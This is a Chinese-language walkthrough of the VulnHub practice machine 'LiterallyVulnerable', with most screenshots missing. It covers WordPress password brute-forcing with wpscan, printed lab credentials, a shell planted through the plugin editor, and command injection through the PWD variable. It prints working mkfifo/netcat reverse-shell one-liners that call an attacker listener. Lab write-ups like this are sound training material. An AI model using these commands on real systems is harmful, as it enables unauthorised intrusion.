Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.


vulnhub >_ LiterallyVulnerable

LiterallyVulnerable

image-20200713222221001

image-20200713223445927

image-20200713224443396

image-20200714014817277

image-20200714015246460

80

image-20200714015815871

显示不正确,先加个hosts

image-20200714015859359

image-20200714020013972

image-20200714020129568

4

admin用户确认。

利用之前的密码名单尝试暴力

wpscan --url http://literally.vulnerable/ -e u,vp -P backupPasswords

wpscan

image-20200714022902910

又一个wp

image-20200714023118484

image-20200714024915017

image-20200714024716629

在其中的帖子中发现

image-20200714024821740

看来密码应该是用在这里的

同样的密码名单在65535端口上再次做同样的尝试

image-20200714024055228

maybeadmin
$EPid%J2L9LufO5

登录成功。

image-20200714030143544

在已经发布的页面中查看被密码保护的帖子

image-20200714030000867

一个新的凭证

image-20200714030503566

notadmin:Pa$$w0rd13!&

成功重新登录

image-20200714030634840

登录后台通过修改404提交rshell

image-20200714031031348

image-20200714031113664

报错。尝试修改插件

image-20200714031256174

image-20200714031315282

成功

http://literally.vulnerable:65535/phpcms/wp-content/plugins/akismet/akismet.php

浏览器浏览。在监听端口获得shell

image-20200714031634455

两个用户

image-20200714031810188

image-20200714033022926

分析一下这个二进制程序

image-20200714033331295

image-20200714033412814

尝试运行

image-20200714033305286

所以是抓取了当前路径。echo出来,如果路径指向文件,则能以root越权echo其他用户的文件

同样的我们可以通过伪造目录向这个程序注入命令。

尝试一下

image-20200714034601720

简单的成功注入

再次修改,尝试获得shell,尝试很多种语句,最终确定下面的语句

export PWD=';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.110.132 1338 >/tmp/f'
./itseasy

image-20200714035907266

image-20200714035952205

成功切换到 john

image-20200714040204273

在目录下枚举

image-20200714040321106

image-20200714040442975

发现john的凭证

john:YZW$s8Y49IB#ZZJ

有凭证之后肯定要查看sudo

image-20200714040610072

html路径权限是www-data权限。

返回之前的shell

通过echo伪造test.html

echo '#!/bin/bash' > test.html
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.110.132 1339 >/tmp/f' >> test.html

image-20200714041437905

增加运行权限

image-20200714041818532

在1339建立监听

我们已经有john的凭证,直接ssh登录。john

ssh john@192.168.110.135

通过运行获得root shell

image-20200714041910022

image-20200714042132754